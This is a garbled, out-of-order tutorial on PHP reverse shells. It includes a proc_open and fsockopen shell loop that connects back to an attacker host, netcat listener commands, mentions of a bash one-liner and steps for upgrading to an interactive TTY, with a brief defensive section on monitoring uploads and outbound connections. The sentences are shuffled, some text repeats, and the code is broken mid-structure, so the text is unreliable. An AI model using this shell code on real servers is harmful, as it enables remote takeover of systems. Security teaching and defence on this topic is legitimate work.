Once executed, any command typed into the listener machine is sent across the network, processed by the target server's shell, and the output is streamed back to the listener. 3. Common PHP Reverse Shell Methods
-p 4444 : Specifies the port number to listen on (match this to your payload). Step 2: Prepare the PHP Payload
Press . This command disables local terminal echoing (so your keys pass directly to the remote machine) and brings the backgrounded Netcat listener back to the foreground ( fg ).
: Professional testers often incorporate PHP reverse shells into their command-and-control infrastructure, enabling centralized management of multiple compromised systems.
: Executes a command and passes the raw, unformatted output directly back to the client. It is ideal for handling binary data output. Advanced Stream Handling
By default, standard reverse shells lack basic terminal features. You cannot use text editors like nano , use the Tab key for auto-completion, or navigate through your command history using the arrow keys. Furthermore, pressing Ctrl+C will instantly kill your connection. Reverse Shell Php
$sock = @fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) die("No connection: $errstr ($errno)");
Monitor changes to PHP files in web-accessible directories. Alert on new .php files in upload folders.
The most universal tool for this is . Run the following command on the control machine before executing the PHP script: nc -lvnp 4444 Use code with caution. Command breakdown: -l : Sets Netcat to listen mode.
A typical PHP reverse shell implementation consists of several interdependent components that work together to establish and maintain the remote connection:
stream_set_blocking($fp, 0);
PHP reverse shells remain a cornerstone technique in web application security, exploiting the very flexibility that makes PHP a popular server‑side language. Understanding how they work—from the core socket connection to advanced evasion tactics—equips defenders to better protect their systems and helps ethical hackers identify vulnerabilities before malicious actors exploit them.
array("pipe", "r"), // stdin 1 => array("pipe", "w"), // stdout 2 => array("pipe", "w") // stderr ); // Spawn the shell process $process = proc_open('/bin/sh -i', $descriptorspec, $pipes); if (!is_resource($process)) exit(1); // Make pipes and socket non-blocking stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($socket, 0); while (1) feof($pipes[1])) break; // Read from shell stdout/stderr and write to socket $read_a = array($pipes[1], $pipes[2], $socket); $write_a = null; $error_a = null; // Monitor streams if (stream_select($read_a, $write_a, $error_a, null) > 0) if (in_array($pipes[1], $read_a)) $input = fread($pipes[1], $chunk_size); fwrite($socket, $input); if (in_array($pipes[2], $read_a)) $input = fread($pipes[2], $chunk_size); fwrite($socket, $input); if (in_array($socket, $read_a)) $input = fread($socket, $chunk_size); fwrite($pipes[0], $input); // Clean up resources fclose($socket); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); ?> Use code with caution. Method 2: The One-Liner (Web Shell/Execution payload)
Once the PHP script triggers on the server, your Netcat terminal will display a successful connection message and provide a command prompt. 5. Upgrading to a Fully Interactive TTY Shell
When the target system uses Bash, a reverse shell can be implemented using shell redirection without requiring PHP process management functions:
Defense in depth means patching both: restrict file uploads/execution AND block unexpected outbound connections. Once executed, any command typed into the listener
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
The attacker opens a specific port on their own machine and waits for a connection.
Securing a web server against PHP execution requires a multi-layered defense-in-depth approach. 1. Secure File Upload Mechanisms
The reverse shell approach offers several distinct advantages from an offensive perspective: